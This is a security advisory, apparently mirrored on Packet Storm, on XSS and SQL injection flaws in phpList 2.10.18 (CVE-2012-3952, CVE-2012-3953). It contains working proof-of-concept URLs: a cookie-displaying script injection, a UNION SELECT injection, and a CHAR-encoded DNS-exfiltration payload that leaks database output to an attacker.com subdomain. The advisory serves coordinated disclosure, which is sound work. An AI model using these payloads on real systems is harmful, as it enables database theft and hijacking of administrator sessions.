what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

phpList 2.10.18 Cross Site Scripting / SQL Injection

phpList 2.10.18 Cross Site Scripting / SQL Injection
Posted Aug 9, 2012
Authored by High-Tech Bridge SA | Site htbridge.com

phpList version 2.10.18 suffers from cross site scripting and remote SQL injection vulnerabilities.

tags | exploit, remote, vulnerability, xss, sql injection
advisories | CVE-2012-3952, CVE-2012-3953
SHA-256 | 7c2f52b5334b8d1ae75b3fffb38e7c18fedbae4934a65a5cc1c9ab975dea72d9

phpList 2.10.18 Cross Site Scripting / SQL Injection

Change Mirror Download
Advisory ID: HTB23100
Product: phpList
Vendor: phpList Ltd
Vulnerable Version(s): 2.10.18 and probably prior
Tested Version: 2.10.18
Vendor Notification: July 11, 2012
Public Disclosure: August 8, 2012
Vulnerability Type: Cross-Site Scripting [CWE-79], SQL Injection [CWE-89]
CVE References: CVE-2012-3952, CVE-2012-3953
CVSSv2 Base Scores: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N), 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P)
Solution Status: Fixed by Vendor
Risk Level: Medium
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )

-----------------------------------------------------------------------------------------------

Advisory Details:

High-Tech Bridge Security Research Lab has discovered multiple vulnerabilities in phpList, which can be exploited to perform Cross-Site Scripting (XSS) and SQL Injection attacks against the vulnerable application.


1) Cross-Site Scripting (XSS) in phpList: CVE-2012-3952

Input passed via the "unconfirmed" GET parameter to /admin/index.php (when "page" is set to "user") is not properly sanitised before being returned to the user.

This can be exploited to execute arbitrary HTML and script code in administrator's browser session in context of affected website.

The following PoC (Proof of Concept) demonstrates the vulnerability:


http://[host]/admin/?page=user&find=1&unconfirmed=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E



2) SQL Injection in phpList: CVE-2012-3953

Input passed via the "delete" GET parameter to /admin/index.php (when "page" is set to "editattributes") is not properly sanitised before being used in SQL query.

This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. However successful exploitation of this vulnerability requires administrator's privileges.


The following PoC demonstrates vulnerability exploitation under administrator's account:


http://[host]/admin/?page=editattributes&id=1&delete=1 union select version() --



Alternative exploitation of the SQL injection can be performed via XSRF vector and does not require administrative privileges. The PoC code below is based on DNS Exfiltration technique and may be used if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP addess for `version()` (or any other sensetive output from the database) subdomain of ".attacker.com" (a domain name, DNS server of which is controlled by the attacker):


http://[host]/admin/?page=editattributes&id=1&delete=1 union select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114))) --



Second alternative is to exploit this SQL injection vulnerability also via XSRF vector, but to perform XSS attack against logged-in administrator. The following PoC code will simply display administrator cookies:


http://[host]/admin/?page=editattributes&id=1&delete=1 union select char(60,115,99,114,105,112,116,62,97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41,59,60,47,115,99,114,105,112,116,62) --




-----------------------------------------------------------------------------------------------

Solution:

Upgrade to phpList 2.10.19

More Information:
http://www.phplist.com/?lid=579

-----------------------------------------------------------------------------------------------

References:

[1] High-Tech Bridge Advisory HTB23100 - https://www.htbridge.com/advisory/HTB23100 - Cross-Site Scripting (XSS) in phpList.
[2] phpList - http://www.phplist.com - phpList is the world's most popular open source email campaign manager.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.

-----------------------------------------------------------------------------------------------

Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close